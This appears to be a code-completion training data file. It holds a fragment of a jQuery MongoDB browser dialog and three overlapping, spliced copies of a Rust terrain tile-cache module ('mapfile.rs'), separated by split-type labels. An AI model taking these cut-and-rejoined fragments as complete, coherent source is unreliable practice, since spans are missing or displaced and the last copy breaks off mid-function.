var tble = '<table id="dlg_mongo_tabs_search_resultlisttbl" class="display" border="1" style="width:100%;border:gray 1px groove; padding:3px; margin:3px;" cellpadding="3px" cellspacing="3px">'+
'<thead>'+
'<tr>'+
ths+
'</tr>'+
'</thead>'+
'<tfoot>'+
'<tr>'+
ths+
'</tr>'+
'</tfoot>'+
'<tbody>'+
'</tbody>'+
'</table>';
$("#dlg_mongo_tabs_search_resultlist","#dlg_mongo_tabs").html(tble);
de.sc.portal.env.dlg.mongo.tbl = $("#dlg_mongo_tabs_search_resultlisttbl", "#dlg_mongo_tabs").DataTable({
paging: false,
searching: true,
ordering: true,
info: true,
order: [[ 1, "desc" ]]
});
}
for(var i=0;i<hits.length;i++)
{
hit = hits[i];
var ahit = new Array();
for(attrName in hit)
{
if(attrName.indexOf('_') === 0)continue;
var attrValue = hit[attrName];
ahit.push(attrValue);
}
//TODO: check if draw could be called only once at the end of the loop
de.sc.portal.env.dlg.mongo.tbl.row.add(ahit).draw();
}
$(searchB).next().hide();
})
.error(function(xhr, statusmsg, err)
{
$(searchB).next().hide();
de.sc.log("\ncisLastTabActivated:\nstatus:'"+statusmsg+"'\nerror:'"+err+"'\nurl: '"+url+"'\nthis:'"+window.location.href+"'", de.sc.WRN);
});
};
de.sc.portal.env.dlg.mongo.onSelectDBs = function(eSelect)
{
$("#cols, #fields","#dlg_mongo_tabs").html(" ");
var db = eSelect.options[eSelect.selectedIndex].value;
if(de.sc.isempty(db))return;
var select = $("#cols","#dlg_mongo_tabs");
select.next().show();
var url = de.sc.portal.env.dlg.mongo.mu.d()+db+"/$cmd/?filter_$eval=function(){return%20db.getCollectionNames()}&limit=1";
$.ajax
({
url: ((window.location.href.indexOf("http") === 0) ? ("/cgi-bin/get_with_params.cgi?"+escape(url)) : "_getColNames"), dataType:"json"
})
.success(function(data)
{
var cols = data["rows"][0]["retval"];
if (select.size() < 1)
{
de.sc.log("onSelectDBs:\n!select"+ui.newTab.html(), de.sc.ERR);
return;
}
select.html("<option></option>");
for(var i=0;i<cols.length;i++)
{
var col = cols[i];
var tit = col.replace(/^mongo/, "").replace(/Impl$/, "");
var o = new Option(tit, col, false, false);
select[0][select[0].options.length] = o;
}
select.next().hide();
})
.error(function(xhr, statusmsg, err)
{
select.next().hide();
de.sc.log("\ncisLastTabActivated:\nstatus:'"+statusmsg+"'\nerror:'"+err+"'\nurl: '"+url+"'\nthis:'"+window.location.href+"'", de.sc.WRN);
});
};
de.sc.portal.env.dlg.mongo.onTabActivate = function(event, ui)
{
if(de.sc.portal.env.dlg.mongo.isLastTabActivated(ui))
{
return;
}
if(de.sc.portal.env.dlg.mongo.isFirstTabActivated(ui))
{
return;
}
var sTabText = $.trim(ui.newTab.html().replace(/<.*?>/g, ""));
var url = de.sc.portal.env.dlg.mongo.mu.d()+sTabText.replace(/\s*/g, "").upperFirst(false);
$.ajax
({
url: ((window.location.href.indexOf("http") === 0) ? ("/cgi-bin/get.cgi?"+escape(url)) : "_hostInfo"), dataType:"json"
})
.success(function(data)
{
var tbl = de.sc.portal.env.dlg.mongo.maketable(data, 0);
ui.newPanel.html("<div>"+tbl+"</div>");
})
.error(function(xhr, statusmsg, err)
{
de.sc.log("\nconTabActivate:\nstatus:'"+statusmsg+"'\nerror:'"+err+"'\nurl: '"+url+"'\nthis:'"+window.location.href+"'", de.sc.WRN);
});
};
de.sc.portal.env.dlg.mongo.maketable = function(data, iRecDepth)
{
var s = "";
for(var attrName in data)
{
if(""+attrName == "0")break;
var attrValue = data[attrName];
if((typeof attrValue !== 'string') && attrValue.length)
{
for(var i=0;i<attrValue.length;i++)
{
s += de.sc.portal.env.dlg.mongo.maketableentry(iRecDepth+1, attrName+" ("+(i+1)+")", attrValue[i]);
}
}
else
{
s += de.sc.portal.env.dlg.mongo.maketableentry(iRecDepth+1, attrName, attrValue);
}
}
return s;
};
de.sc.portal.env.dlg.mongo.maketableentry = function(iRecDepth, attrName, attrValue)
{
var s = " <div class='treeentry e"+iRecDepth+"' "+(iRecDepth > 1 ? "style='display:none;'" : "")+"> <img src='./img/treemarker.png' />";
var hasChildren = true;
if((typeof attrValue === 'string') || (typeof attrValue === 'number') || (typeof attrValue === 'boolean'))
{
hasChildren = false;
if(typeof attrValue === 'number')
{
if(attrName == "$date")
{
attrValue = new Date(attrValue);
}
else
{
attrValue = attrValue.formatNumber();
}
}
}
if (hasChildren)
{
s += " <a href='#' class='awithplusminus onexpand'><img src='./img/plus.gif' /><img src='./img/minus.gif' style='display:none;' /></a> ";
}
else
{
s += " <img src='./img/spacer.gif' style='width:9px;' /> ";
}
s += " <span class='attrname'>"+attrName+(hasChildren ? '' : ': ')+"</span> ";
if(!hasChildren)
{
s += " <span class='attrvalue'>"+attrValue+"</span>";
}
else
{
s += de.sc.portal.env.dlg.mongo.maketable(attrValue, iRecDepth+1);
}
s += "</div>";
return s;
}; | random_line_split | |
mapfile.rs | use crate::cache::TERRA_DIRECTORY;
use crate::terrain::quadtree::node::VNode;
use crate::terrain::tile_cache::{LayerParams, LayerType, TextureFormat};
use anyhow::Error;
use serde::{Deserialize, Serialize};
use std::fs::{self, File};
use std::io::{BufReader, BufWriter, Read, Write};
use std::path::PathBuf;
use vec_map::VecMap;
#[derive(Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
pub(crate) enum TileState {
Missing,
Base,
Generated,
GpuOnly,
MissingBase,
}
#[derive(PartialEq, Eq, Serialize, Deserialize)]
pub(crate) enum TileKind {
Base,
Generate,
GpuOnly,
}
#[derive(PartialEq, Eq, Serialize, Deserialize)]
struct TileMeta {
crc32: u32,
state: TileState,
}
#[derive(Copy, Clone, Debug, Serialize, Deserialize)]
pub(crate) struct TextureDescriptor {
pub width: u32,
pub height: u32,
pub depth: u32,
pub format: TextureFormat,
pub bytes: usize,
}
pub struct MapFile {
layers: VecMap<LayerParams>,
_db: sled::Db,
tiles: sled::Tree,
textures: sled::Tree,
}
impl MapFile {
pub(crate) fn new(layers: VecMap<LayerParams>) -> Self {
let directory = TERRA_DIRECTORY.join("tiles/meta");
let db = sled::open(&directory).expect(&format!(
"Failed to open/create sled database. Deleting the '{}' directory may fix this",
directory.display()
));
db.insert("version", "1").unwrap();
Self {
layers,
tiles: db.open_tree("tiles").unwrap(),
textures: db.open_tree("textures").unwrap(),
_db: db,
}
}
pub(crate) fn tile_state(&self, layer: LayerType, node: VNode) -> Result<TileState, Error> {
Ok(match self.lookup_tile_meta(layer, node)? {
Some(meta) => meta.state,
None => TileState::GpuOnly,
})
}
pub(crate) fn read_tile(&self, layer: LayerType, node: VNode) -> Option<Vec<u8>> {
let filename = Self::tile_name(layer, node);
if !filename.exists() {
return None;
}
match layer {
LayerType::Albedo => Some(image::open(filename).ok()?.to_rgba().into_vec()),
LayerType::Heightmaps => {
let mut data = Vec::new();
snap::read::FrameDecoder::new(BufReader::new(File::open(filename).ok()?))
.read_to_end(&mut data)
.ok()?;
let mut qdata = vec![0i16; data.len() / 2];
bytemuck::cast_slice_mut(&mut qdata).copy_from_slice(&data);
let mut prev = 0;
let mut fdata = vec![0f32; qdata.len()];
for (f, q) in fdata.iter_mut().zip(qdata.iter()) {
let x = (*q).wrapping_add(prev);
*f = x as f32;
prev = x;
}
data.clear();
data.extend_from_slice(bytemuck::cast_slice(&fdata));
Some(data)
}
LayerType::Normals | LayerType::Displacements | LayerType::Roughness => {
fs::read(filename).ok()
}
}
}
pub(crate) fn write_tile(
&mut self,
layer: LayerType,
node: VNode,
data: &[u8],
base: bool,
) -> Result<(), Error> {
let filename = Self::tile_name(layer, node);
match layer {
LayerType::Albedo => image::save_buffer_with_format(
&filename,
data,
self.layers[layer].texture_resolution as u32,
self.layers[layer].texture_resolution as u32,
image::ColorType::Rgba8,
image::ImageFormat::Bmp,
)?,
LayerType::Heightmaps => {
let data: &[f32] = bytemuck::cast_slice(data);
let mut qdata = vec![0i16; data.len()];
let mut prev = 0;
for (q, d) in qdata.iter_mut().zip(data.iter()) {
let x = ((*d as i16) / 4) * 4;
*q = x.wrapping_sub(prev);
prev = x;
}
snap::write::FrameEncoder::new(File::create(filename)?)
.write_all(bytemuck::cast_slice(&qdata))?;
}
LayerType::Normals | LayerType::Displacements | LayerType::Roughness => {
fs::write(filename, data)?;
}
}
self.update_tile_meta(
layer,
node,
TileMeta { crc32: 0, state: if base { TileState::Base } else { TileState::Generated } },
)
}
pub(crate) fn read_texture(
&self,
device: &wgpu::Device,
encoder: &mut wgpu::CommandEncoder,
name: &str,
) -> Result<wgpu::Texture, Error> {
let desc = self.lookup_texture(name)?.unwrap();
let texture = device.create_texture(&wgpu::TextureDescriptor {
size: wgpu::Extent3d { width: desc.width, height: desc.height, depth: desc.depth },
format: desc.format.to_wgpu(),
mip_level_count: 1,
sample_count: 1,
dimension: if desc.depth == 1 {
wgpu::TextureDimension::D2
} else {
wgpu::TextureDimension::D3
},
usage: wgpu::TextureUsage::COPY_SRC
| wgpu::TextureUsage::COPY_DST
| wgpu::TextureUsage::SAMPLED
| wgpu::TextureUsage::STORAGE,
label: None,
});
let (width, height) = (desc.width as usize, (desc.height * desc.depth) as usize);
assert_eq!(width % desc.format.block_size() as usize, 0);
assert_eq!(height % desc.format.block_size() as usize, 0);
let (width, height) =
(width / desc.format.block_size() as usize, height / desc.format.block_size() as usize);
let row_bytes = width * desc.format.bytes_per_block();
let row_pitch = (row_bytes + 255) & !255;
let data = if desc.format == TextureFormat::RGBA8 {
image::open(TERRA_DIRECTORY.join(format!("{}.bmp", name)))?.to_rgba().into_vec()
} else {
fs::read(TERRA_DIRECTORY.join(format!("{}.raw", name)))?
};
let buffer = device.create_buffer(&wgpu::BufferDescriptor {
size: (row_pitch * height) as u64,
usage: wgpu::BufferUsage::MAP_WRITE | wgpu::BufferUsage::COPY_SRC,
label: None,
mapped_at_creation: true,
});
let mut buffer_view = buffer.slice(..).get_mapped_range_mut();
for row in 0..height {
buffer_view[row * row_pitch..][..row_bytes]
.copy_from_slice(&data[row * row_bytes..][..row_bytes]);
}
drop(buffer_view);
buffer.unmap();
encoder.copy_buffer_to_texture(
wgpu::BufferCopyView {
buffer: &buffer,
layout: wgpu::TextureDataLayout {
offset: 0,
bytes_per_row: row_pitch as u32,
rows_per_image: height as u32 / desc.depth,
},
},
wgpu::TextureCopyView {
texture: &texture,
mip_level: 0,
origin: wgpu::Origin3d { x: 0, y: 0, z: 0 },
},
wgpu::Extent3d {
width: width as u32,
height: height as u32 / desc.depth,
depth: desc.depth,
},
);
Ok(texture)
}
pub(crate) fn write_texture(
&self,
name: &str,
desc: TextureDescriptor,
data: &[u8],
) -> Result<(), Error> {
self.update_texture(name, desc)?;
if desc.format == TextureFormat::RGBA8 {
let filename = TERRA_DIRECTORY.join(format!("{}.bmp", name));
Ok(image::save_buffer_with_format(
&filename,
data,
desc.width,
desc.height * desc.depth,
image::ColorType::Rgba8,
image::ImageFormat::Bmp,
)?)
} else {
let filename = TERRA_DIRECTORY.join(format!("{}.raw", name));
Ok(fs::write(&filename, data)?)
}
}
pub(crate) fn reload_texture(&self, name: &str) -> bool {
let desc = self.lookup_texture(name);
if let Ok(Some(desc)) = desc {
if desc.format == TextureFormat::RGBA8 {
TERRA_DIRECTORY.join(format!("{}.bmp", name)).exists()
} else {
TERRA_DIRECTORY.join(format!("{}.raw", name)).exists()
}
} else {
false
}
}
pub(crate) fn layers(&self) -> &VecMap<LayerParams> {
&self.layers
}
pub(crate) fn tile_name(layer: LayerType, node: VNode) -> PathBuf {
let face = match node.face() {
0 => "0E",
1 => "180E",
2 => "90E",
3 => "90W",
4 => "N",
5 => "S",
_ => unreachable!(),
};
let (layer, ext) = match layer {
LayerType::Displacements => ("displacements", "raw"),
LayerType::Albedo => ("albedo", "bmp"),
LayerType::Roughness => ("roughness", "raw"),
LayerType::Normals => ("normals", "raw"),
LayerType::Heightmaps => ("heightmaps", "raw.sz"),
};
TERRA_DIRECTORY.join(&format!(
"tiles/{}_{}_{}_{}x{}.{}",
layer,
node.level(),
face,
node.x(),
node.y(),
ext
))
}
pub(crate) fn reload_tile_state(
&self,
layer: LayerType,
node: VNode,
base: bool,
) -> Result<TileState, Error> {
let filename = Self::tile_name(layer, node);
let meta = self.lookup_tile_meta(layer, node);
let exists = filename.exists();
let target_state = if base && exists {
TileState::Base
} else if base {
TileState::MissingBase
} else if exists {
TileState::Generated
} else {
TileState::Missing
};
if let Ok(Some(TileMeta { state, .. })) = meta {
if state == target_state {
return Ok(state);
}
}
let new_meta = TileMeta { state: target_state, crc32: 0 };
self.update_tile_meta(layer, node, new_meta)?;
Ok(target_state)
}
// pub(crate) fn set_missing(
// &self,
// layer: LayerType,
// node: VNode,
// base: bool,
// ) -> Result<(), Error> {
// let state = if base { TileState::MissingBase } else { TileState::Missing };
// self.update_tile_meta(layer, node, TileMeta { crc32: 0, state })
// }
pub(crate) fn clear_generated(&mut self, layer: LayerType) -> Result<(), Error> {
self.scan_tile_meta(layer, |node, meta| {
if let TileState::Generated = meta.state {
self.remove_tile_meta(layer, node)?;
}
Ok(())
})
}
pub(crate) fn get_missing_base(&self, layer: LayerType) -> Result<Vec<VNode>, Error> {
let mut missing = Vec::new();
self.scan_tile_meta(layer, |node, meta| {
if let TileState::MissingBase = meta.state {
missing.push(node);
}
Ok(())
})?;
Ok(missing)
}
//
// These functions use the database.
//
fn lookup_tile_meta(&self, layer: LayerType, node: VNode) -> Result<Option<TileMeta>, Error> {
let key = bincode::serialize(&(layer, node)).unwrap();
Ok(self.tiles.get(key)?.map(|value| bincode::deserialize(&value).unwrap()))
}
fn update_tile_meta(&self, layer: LayerType, node: VNode, meta: TileMeta) -> Result<(), Error> {
let key = bincode::serialize(&(layer, node)).unwrap();
let value = bincode::serialize(&meta).unwrap();
self.tiles.insert(key, value)?;
Ok(())
}
fn remove_tile_meta(&self, layer: LayerType, node: VNode) -> Result<(), Error> {
let key = bincode::serialize(&(layer, node)).unwrap();
self.tiles.remove(key)?;
Ok(())
}
fn scan_tile_meta<F: FnMut(VNode, TileMeta) -> Result<(), Error>>(
&self,
layer: LayerType,
mut f: F,
) -> Result<(), Error> {
let prefix = bincode::serialize(&layer).unwrap();
for i in self.tiles.scan_prefix(&prefix) {
let (k, v) = i?;
let meta = bincode::deserialize::<TileMeta>(&v)?;
let node = bincode::deserialize::<(LayerType, VNode)>(&k)?.1;
f(node, meta)?;
}
Ok(())
}
fn lookup_texture(&self, name: &str) -> Result<Option<TextureDescriptor>, Error> {
Ok(self.textures.get(name)?.map(|value| serde_json::from_slice(&value).unwrap()))
}
fn update_texture(&self, name: &str, desc: TextureDescriptor) -> Result<(), Error> |
}
| {
let value = serde_json::to_vec(&desc).unwrap();
self.textures.insert(name, value)?;
Ok(())
} | identifier_body |
mapfile.rs | use crate::cache::TERRA_DIRECTORY;
use crate::terrain::quadtree::node::VNode;
use crate::terrain::tile_cache::{LayerParams, LayerType, TextureFormat};
use anyhow::Error;
use serde::{Deserialize, Serialize};
use std::fs::{self, File};
use std::io::{BufReader, BufWriter, Read, Write};
use std::path::PathBuf;
use vec_map::VecMap;
#[derive(Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
pub(crate) enum TileState {
Missing,
Base,
Generated,
GpuOnly,
MissingBase,
}
#[derive(PartialEq, Eq, Serialize, Deserialize)]
pub(crate) enum TileKind {
Base,
Generate,
GpuOnly,
}
#[derive(PartialEq, Eq, Serialize, Deserialize)]
struct TileMeta {
crc32: u32,
state: TileState,
}
#[derive(Copy, Clone, Debug, Serialize, Deserialize)]
pub(crate) struct TextureDescriptor {
pub width: u32,
pub height: u32,
pub depth: u32,
pub format: TextureFormat,
pub bytes: usize,
}
pub struct MapFile {
layers: VecMap<LayerParams>,
_db: sled::Db,
tiles: sled::Tree,
textures: sled::Tree,
}
impl MapFile {
pub(crate) fn new(layers: VecMap<LayerParams>) -> Self {
let directory = TERRA_DIRECTORY.join("tiles/meta");
let db = sled::open(&directory).expect(&format!(
"Failed to open/create sled database. Deleting the '{}' directory may fix this",
directory.display()
));
db.insert("version", "1").unwrap();
Self {
layers,
tiles: db.open_tree("tiles").unwrap(),
textures: db.open_tree("textures").unwrap(),
_db: db,
}
}
pub(crate) fn tile_state(&self, layer: LayerType, node: VNode) -> Result<TileState, Error> {
Ok(match self.lookup_tile_meta(layer, node)? {
Some(meta) => meta.state,
None => TileState::GpuOnly,
})
}
pub(crate) fn read_tile(&self, layer: LayerType, node: VNode) -> Option<Vec<u8>> {
let filename = Self::tile_name(layer, node);
if !filename.exists() {
return None;
}
match layer {
LayerType::Albedo => Some(image::open(filename).ok()?.to_rgba().into_vec()),
LayerType::Heightmaps => {
let mut data = Vec::new();
snap::read::FrameDecoder::new(BufReader::new(File::open(filename).ok()?))
.read_to_end(&mut data)
.ok()?;
let mut qdata = vec![0i16; data.len() / 2];
bytemuck::cast_slice_mut(&mut qdata).copy_from_slice(&data);
let mut prev = 0;
let mut fdata = vec![0f32; qdata.len()];
for (f, q) in fdata.iter_mut().zip(qdata.iter()) {
let x = (*q).wrapping_add(prev);
*f = x as f32;
prev = x;
}
data.clear();
data.extend_from_slice(bytemuck::cast_slice(&fdata));
Some(data)
}
LayerType::Normals | LayerType::Displacements | LayerType::Roughness => {
fs::read(filename).ok()
}
}
}
pub(crate) fn write_tile(
&mut self,
layer: LayerType,
node: VNode,
data: &[u8],
base: bool,
) -> Result<(), Error> {
let filename = Self::tile_name(layer, node);
match layer {
LayerType::Albedo => image::save_buffer_with_format(
&filename,
data,
self.layers[layer].texture_resolution as u32,
self.layers[layer].texture_resolution as u32,
image::ColorType::Rgba8,
image::ImageFormat::Bmp,
)?,
LayerType::Heightmaps => {
let data: &[f32] = bytemuck::cast_slice(data);
let mut qdata = vec![0i16; data.len()];
let mut prev = 0;
for (q, d) in qdata.iter_mut().zip(data.iter()) {
let x = ((*d as i16) / 4) * 4;
*q = x.wrapping_sub(prev);
prev = x;
}
snap::write::FrameEncoder::new(File::create(filename)?)
.write_all(bytemuck::cast_slice(&qdata))?;
}
LayerType::Normals | LayerType::Displacements | LayerType::Roughness => {
fs::write(filename, data)?;
}
}
self.update_tile_meta(
layer,
node,
TileMeta { crc32: 0, state: if base { TileState::Base } else { TileState::Generated } },
)
}
pub(crate) fn read_texture(
&self,
device: &wgpu::Device,
encoder: &mut wgpu::CommandEncoder,
name: &str,
) -> Result<wgpu::Texture, Error> {
let desc = self.lookup_texture(name)?.unwrap();
let texture = device.create_texture(&wgpu::TextureDescriptor {
size: wgpu::Extent3d { width: desc.width, height: desc.height, depth: desc.depth },
format: desc.format.to_wgpu(),
mip_level_count: 1,
sample_count: 1,
dimension: if desc.depth == 1 {
wgpu::TextureDimension::D2
} else {
wgpu::TextureDimension::D3
},
usage: wgpu::TextureUsage::COPY_SRC
| wgpu::TextureUsage::COPY_DST
| wgpu::TextureUsage::SAMPLED
| wgpu::TextureUsage::STORAGE,
label: None,
});
let (width, height) = (desc.width as usize, (desc.height * desc.depth) as usize);
assert_eq!(width % desc.format.block_size() as usize, 0);
assert_eq!(height % desc.format.block_size() as usize, 0);
let (width, height) =
(width / desc.format.block_size() as usize, height / desc.format.block_size() as usize);
let row_bytes = width * desc.format.bytes_per_block();
let row_pitch = (row_bytes + 255) & !255;
let data = if desc.format == TextureFormat::RGBA8 {
image::open(TERRA_DIRECTORY.join(format!("{}.bmp", name)))?.to_rgba().into_vec()
} else {
fs::read(TERRA_DIRECTORY.join(format!("{}.raw", name)))?
};
let buffer = device.create_buffer(&wgpu::BufferDescriptor {
size: (row_pitch * height) as u64,
usage: wgpu::BufferUsage::MAP_WRITE | wgpu::BufferUsage::COPY_SRC,
label: None,
mapped_at_creation: true,
});
let mut buffer_view = buffer.slice(..).get_mapped_range_mut();
for row in 0..height {
buffer_view[row * row_pitch..][..row_bytes]
.copy_from_slice(&data[row * row_bytes..][..row_bytes]);
}
drop(buffer_view);
buffer.unmap();
encoder.copy_buffer_to_texture(
wgpu::BufferCopyView {
buffer: &buffer,
layout: wgpu::TextureDataLayout {
offset: 0,
bytes_per_row: row_pitch as u32,
rows_per_image: height as u32 / desc.depth,
},
},
wgpu::TextureCopyView {
texture: &texture,
mip_level: 0,
origin: wgpu::Origin3d { x: 0, y: 0, z: 0 },
},
wgpu::Extent3d {
width: width as u32,
height: height as u32 / desc.depth,
depth: desc.depth,
},
);
Ok(texture)
}
pub(crate) fn write_texture(
&self,
name: &str,
desc: TextureDescriptor,
data: &[u8],
) -> Result<(), Error> {
self.update_texture(name, desc)?;
if desc.format == TextureFormat::RGBA8 {
let filename = TERRA_DIRECTORY.join(format!("{}.bmp", name));
Ok(image::save_buffer_with_format(
&filename,
data,
desc.width,
desc.height * desc.depth,
image::ColorType::Rgba8,
image::ImageFormat::Bmp,
)?)
} else {
let filename = TERRA_DIRECTORY.join(format!("{}.raw", name));
Ok(fs::write(&filename, data)?)
}
}
pub(crate) fn reload_texture(&self, name: &str) -> bool {
let desc = self.lookup_texture(name);
if let Ok(Some(desc)) = desc {
if desc.format == TextureFormat::RGBA8 {
TERRA_DIRECTORY.join(format!("{}.bmp", name)).exists()
} else {
TERRA_DIRECTORY.join(format!("{}.raw", name)).exists()
}
} else {
false
}
}
pub(crate) fn layers(&self) -> &VecMap<LayerParams> {
&self.layers
}
pub(crate) fn tile_name(layer: LayerType, node: VNode) -> PathBuf {
let face = match node.face() {
0 => "0E",
1 => "180E",
2 => "90E",
3 => "90W",
4 => "N",
5 => "S",
_ => unreachable!(),
};
let (layer, ext) = match layer {
LayerType::Displacements => ("displacements", "raw"),
LayerType::Albedo => ("albedo", "bmp"),
LayerType::Roughness => ("roughness", "raw"),
LayerType::Normals => ("normals", "raw"),
LayerType::Heightmaps => ("heightmaps", "raw.sz"),
};
TERRA_DIRECTORY.join(&format!(
"tiles/{}_{}_{}_{}x{}.{}",
layer,
node.level(),
face,
node.x(),
node.y(),
ext
))
}
pub(crate) fn | (
&self,
layer: LayerType,
node: VNode,
base: bool,
) -> Result<TileState, Error> {
let filename = Self::tile_name(layer, node);
let meta = self.lookup_tile_meta(layer, node);
let exists = filename.exists();
let target_state = if base && exists {
TileState::Base
} else if base {
TileState::MissingBase
} else if exists {
TileState::Generated
} else {
TileState::Missing
};
if let Ok(Some(TileMeta { state, .. })) = meta {
if state == target_state {
return Ok(state);
}
}
let new_meta = TileMeta { state: target_state, crc32: 0 };
self.update_tile_meta(layer, node, new_meta)?;
Ok(target_state)
}
// pub(crate) fn set_missing(
// &self,
// layer: LayerType,
// node: VNode,
// base: bool,
// ) -> Result<(), Error> {
// let state = if base { TileState::MissingBase } else { TileState::Missing };
// self.update_tile_meta(layer, node, TileMeta { crc32: 0, state })
// }
pub(crate) fn clear_generated(&mut self, layer: LayerType) -> Result<(), Error> {
self.scan_tile_meta(layer, |node, meta| {
if let TileState::Generated = meta.state {
self.remove_tile_meta(layer, node)?;
}
Ok(())
})
}
pub(crate) fn get_missing_base(&self, layer: LayerType) -> Result<Vec<VNode>, Error> {
let mut missing = Vec::new();
self.scan_tile_meta(layer, |node, meta| {
if let TileState::MissingBase = meta.state {
missing.push(node);
}
Ok(())
})?;
Ok(missing)
}
//
// These functions use the database.
//
fn lookup_tile_meta(&self, layer: LayerType, node: VNode) -> Result<Option<TileMeta>, Error> {
let key = bincode::serialize(&(layer, node)).unwrap();
Ok(self.tiles.get(key)?.map(|value| bincode::deserialize(&value).unwrap()))
}
fn update_tile_meta(&self, layer: LayerType, node: VNode, meta: TileMeta) -> Result<(), Error> {
let key = bincode::serialize(&(layer, node)).unwrap();
let value = bincode::serialize(&meta).unwrap();
self.tiles.insert(key, value)?;
Ok(())
}
fn remove_tile_meta(&self, layer: LayerType, node: VNode) -> Result<(), Error> {
let key = bincode::serialize(&(layer, node)).unwrap();
self.tiles.remove(key)?;
Ok(())
}
fn scan_tile_meta<F: FnMut(VNode, TileMeta) -> Result<(), Error>>(
&self,
layer: LayerType,
mut f: F,
) -> Result<(), Error> {
let prefix = bincode::serialize(&layer).unwrap();
for i in self.tiles.scan_prefix(&prefix) {
let (k, v) = i?;
let meta = bincode::deserialize::<TileMeta>(&v)?;
let node = bincode::deserialize::<(LayerType, VNode)>(&k)?.1;
f(node, meta)?;
}
Ok(())
}
fn lookup_texture(&self, name: &str) -> Result<Option<TextureDescriptor>, Error> {
Ok(self.textures.get(name)?.map(|value| serde_json::from_slice(&value).unwrap()))
}
fn update_texture(&self, name: &str, desc: TextureDescriptor) -> Result<(), Error> {
let value = serde_json::to_vec(&desc).unwrap();
self.textures.insert(name, value)?;
Ok(())
}
}
| reload_tile_state | identifier_name |
mapfile.rs | use crate::cache::TERRA_DIRECTORY;
use crate::terrain::quadtree::node::VNode;
use crate::terrain::tile_cache::{LayerParams, LayerType, TextureFormat};
use anyhow::Error;
use serde::{Deserialize, Serialize};
use std::fs::{self, File};
use std::io::{BufReader, BufWriter, Read, Write};
use std::path::PathBuf;
use vec_map::VecMap;
#[derive(Clone, Copy, PartialEq, Eq, Serialize, Deserialize)]
pub(crate) enum TileState {
Missing,
Base,
Generated,
GpuOnly,
MissingBase,
}
#[derive(PartialEq, Eq, Serialize, Deserialize)]
pub(crate) enum TileKind {
Base,
Generate,
GpuOnly,
}
#[derive(PartialEq, Eq, Serialize, Deserialize)]
struct TileMeta {
crc32: u32,
state: TileState,
}
#[derive(Copy, Clone, Debug, Serialize, Deserialize)]
pub(crate) struct TextureDescriptor {
pub width: u32,
pub height: u32,
pub depth: u32,
pub format: TextureFormat,
pub bytes: usize,
}
pub struct MapFile {
layers: VecMap<LayerParams>,
_db: sled::Db,
tiles: sled::Tree,
textures: sled::Tree,
}
impl MapFile {
pub(crate) fn new(layers: VecMap<LayerParams>) -> Self {
let directory = TERRA_DIRECTORY.join("tiles/meta");
let db = sled::open(&directory).expect(&format!(
"Failed to open/create sled database. Deleting the '{}' directory may fix this",
directory.display()
));
db.insert("version", "1").unwrap();
Self {
layers,
tiles: db.open_tree("tiles").unwrap(),
textures: db.open_tree("textures").unwrap(),
_db: db,
}
}
pub(crate) fn tile_state(&self, layer: LayerType, node: VNode) -> Result<TileState, Error> {
Ok(match self.lookup_tile_meta(layer, node)? {
Some(meta) => meta.state,
None => TileState::GpuOnly,
})
}
pub(crate) fn read_tile(&self, layer: LayerType, node: VNode) -> Option<Vec<u8>> {
let filename = Self::tile_name(layer, node);
if !filename.exists() {
return None;
}
match layer {
LayerType::Albedo => Some(image::open(filename).ok()?.to_rgba().into_vec()),
LayerType::Heightmaps => {
let mut data = Vec::new();
snap::read::FrameDecoder::new(BufReader::new(File::open(filename).ok()?))
.read_to_end(&mut data)
.ok()?;
let mut qdata = vec![0i16; data.len() / 2];
bytemuck::cast_slice_mut(&mut qdata).copy_from_slice(&data);
let mut prev = 0;
let mut fdata = vec![0f32; qdata.len()];
for (f, q) in fdata.iter_mut().zip(qdata.iter()) {
let x = (*q).wrapping_add(prev);
*f = x as f32;
prev = x;
}
data.clear();
data.extend_from_slice(bytemuck::cast_slice(&fdata));
Some(data)
}
LayerType::Normals | LayerType::Displacements | LayerType::Roughness => {
fs::read(filename).ok()
}
}
}
pub(crate) fn write_tile(
&mut self,
layer: LayerType,
node: VNode,
data: &[u8],
base: bool,
) -> Result<(), Error> {
let filename = Self::tile_name(layer, node);
match layer {
LayerType::Albedo => image::save_buffer_with_format(
&filename,
data,
self.layers[layer].texture_resolution as u32,
self.layers[layer].texture_resolution as u32,
image::ColorType::Rgba8,
image::ImageFormat::Bmp,
)?,
LayerType::Heightmaps => {
let data: &[f32] = bytemuck::cast_slice(data);
let mut qdata = vec![0i16; data.len()];
let mut prev = 0;
for (q, d) in qdata.iter_mut().zip(data.iter()) {
let x = ((*d as i16) / 4) * 4;
*q = x.wrapping_sub(prev);
prev = x;
}
snap::write::FrameEncoder::new(File::create(filename)?)
.write_all(bytemuck::cast_slice(&qdata))?;
}
LayerType::Normals | LayerType::Displacements | LayerType::Roughness => {
fs::write(filename, data)?;
}
}
self.update_tile_meta(
layer,
node,
TileMeta { crc32: 0, state: if base { TileState::Base } else { TileState::Generated } },
)
}
pub(crate) fn read_texture(
&self,
device: &wgpu::Device,
encoder: &mut wgpu::CommandEncoder,
name: &str,
) -> Result<wgpu::Texture, Error> {
let desc = self.lookup_texture(name)?.unwrap();
let texture = device.create_texture(&wgpu::TextureDescriptor {
size: wgpu::Extent3d { width: desc.width, height: desc.height, depth: desc.depth },
format: desc.format.to_wgpu(),
mip_level_count: 1,
sample_count: 1,
dimension: if desc.depth == 1 {
wgpu::TextureDimension::D2
} else {
wgpu::TextureDimension::D3
},
usage: wgpu::TextureUsage::COPY_SRC
| wgpu::TextureUsage::COPY_DST
| wgpu::TextureUsage::SAMPLED
| wgpu::TextureUsage::STORAGE,
label: None,
});
let (width, height) = (desc.width as usize, (desc.height * desc.depth) as usize);
assert_eq!(width % desc.format.block_size() as usize, 0);
assert_eq!(height % desc.format.block_size() as usize, 0);
let (width, height) =
(width / desc.format.block_size() as usize, height / desc.format.block_size() as usize);
let row_bytes = width * desc.format.bytes_per_block();
let row_pitch = (row_bytes + 255) & !255;
let data = if desc.format == TextureFormat::RGBA8 {
image::open(TERRA_DIRECTORY.join(format!("{}.bmp", name)))?.to_rgba().into_vec()
} else {
fs::read(TERRA_DIRECTORY.join(format!("{}.raw", name)))?
};
let buffer = device.create_buffer(&wgpu::BufferDescriptor {
size: (row_pitch * height) as u64,
usage: wgpu::BufferUsage::MAP_WRITE | wgpu::BufferUsage::COPY_SRC,
label: None,
mapped_at_creation: true,
});
let mut buffer_view = buffer.slice(..).get_mapped_range_mut();
for row in 0..height {
buffer_view[row * row_pitch..][..row_bytes]
.copy_from_slice(&data[row * row_bytes..][..row_bytes]);
}
drop(buffer_view);
